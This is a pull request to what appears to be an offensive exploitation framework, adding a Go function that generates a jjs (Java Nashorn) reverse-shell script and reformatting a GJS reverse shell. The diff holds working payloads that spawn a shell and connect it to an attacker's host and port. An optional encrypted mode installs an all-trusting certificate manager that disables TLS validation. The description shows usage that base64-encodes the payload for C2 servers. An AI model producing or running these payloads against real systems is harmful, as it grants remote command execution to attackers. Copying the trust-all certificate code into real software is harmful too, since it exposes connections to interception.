### PR TITLE
JJS Reverse Shell (Encrypted and Unencrypted)

### DIFF
--- a/payload/reverse.go
+++ b/payload/reverse.go
@@ -46,18 +46,80 @@ func ReverseShellMknodOpenSSL(lhost string, lport int) string {
 // gjs (Gnome JS - present on Ubuntu, Debian by default).
 func ReverseShellGJSScript(lhost string, lport int) string {
 	return fmt.Sprintf(`const Gio = imports.gi.Gio;
-	const GLib = imports.gi.GLib;
+const GLib = imports.gi.GLib;
 
+try {
+	let connection = (new Gio.SocketClient()).connect_to_host("%s:%d", null, null);
+	let output = connection.get_output_stream();
+	let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() });
+
+	while (true) {
+		let [cmd, size] = input.read_line(null);
+		let [res, out, err, status] = GLib.spawn_command_line_sync(imports.byteArray.toString(cmd));
+		output.write_bytes(new GLib.Bytes(imports.byteArray.toString(out)), null);
+	}
+} catch (e) {
+}`, lhost, lport)
+}
+
+// Generates a script that can be used to create a reverse shell via jjs (Java javascript).
+// This is an adapted version of Frohoff's OG gist. Additionally, the disabling of TLS validation
+// logic was adapted from a blog written by Callan Howell-Pavia.
+//
+// https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/
+// https://gist.github.com/frohoff/8e7c2bf3737032a25051
+func ReverseShellJJSScript(shell string, lhost string, lport int, ssl bool) string {
+	script := fmt.Sprintf(`var p=new java.lang.ProcessBuilder("%s").redirectErrorStream(true).start();`, shell)
+	if ssl {
+		script += fmt.Sprintf(`
+var X509TrustManager = Java.type("javax.net.ssl.X509TrustManager");
+var permissiveTrustManager = Java.extend(X509TrustManager,
+  {
+    getAcceptedIssuers: function(){return null;},
+    checkClientTrusted: function(certs, authType){return;},
+    checkServerTrusted: function(certs, authType){return;}
+  }
+);
+var trustAllCerts = [new permissiveTrustManager()];
+
+// Install the all-trusting trust manager
+var sc = javax.net.ssl.SSLContext.getInstance("TLS");
+sc.init(null, trustAllCerts, new java.security.SecureRandom());
+var factory = sc.getSocketFactory();
+var s=factory.createSocket("%s", %d);
+s.startHandshake()`, lhost, lport)
+	} else {
+		script += fmt.Sprintf(`var s=new java.net.Socket("%s", %d);`, lhost, lport)
+	}
+	script += `
+var socketInput = new java.io.BufferedReader(new java.io.InputStreamReader(s.getInputStream()));
+var socketOutput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(s.getOutputStream()));
+var processInput = new java.io.BufferedWriter(new java.io.OutputStreamWriter(p.getOutputStream()));
+var processOutput = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));
+
+while (!s.isClosed()) {
+	var data
+	if ((data = socketInput.readLine()) != null) {
+		processInput.write(data + "\n");
+		processInput.flush()
+	}
+	java.lang.Thread.sleep(50);
+
+	while (processOutput.ready() && (data = processOutput.read()) > 0) {
+			socketOutput.write(data);
+	}
+	socketOutput.flush()
+
+	// check that the process is running
 	try {
-		let connection = (new Gio.SocketClient()).connect_to_host("%s:%d", null, null);
-		let output = connection.get_output_stream();
-		let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() });
-
-		while (true) {
-			let [cmd, size] = input.read_line(null);
-			let [res, out, err, status] = GLib.spawn_command_line_sync(imports.byteArray.toString(cmd));
-			output.write_bytes(new GLib.Bytes(imports.byteArray.toString(out)), null);
-		}
+		p.exitValue();
+		break;
 	} catch (e) {
-	}`, lhost, lport)
+	}
+}
+
+p.destroy();
+s.close();`
+
+	return script
 }


### PR DESCRIPTION
Found myself in a scenario where I wanted need to a reverse shell and jjs was available on the system. OpenSSL was not, so I didn't have anything in the framework that would establish an encrypted reverse shell. So I adapted the well known jjs reverse shell by Frohoff, and added TLS negotiation.

Usage:

```go
func generatePayload(conf *config.Config) (string, bool) {
	generated := ""

	switch conf.C2Type {
	case c2.SSLShellServer:
		output.PrintfStatus("Sending an SSL reverse shell payload for port %s:%d", conf.Lhost, conf.Lport)
		generated = payload.ReverseShellJJSScript("bash", conf.Lhost, conf.Lport, true)
	case c2.SimpleShellServer:
		output.PrintfStatus("Sending a reverse shell payload for port %s:%d", conf.Lhost, conf.Lport)
		generated = payload.ReverseShellJJSScript("bash", conf.Lhost, conf.Lport, false)
	default:
		output.PrintError("Invalid payload")

		return "", false
	}

	generated = b64.StdEncoding.EncodeToString([]byte(generated))

	return generated, true
}
```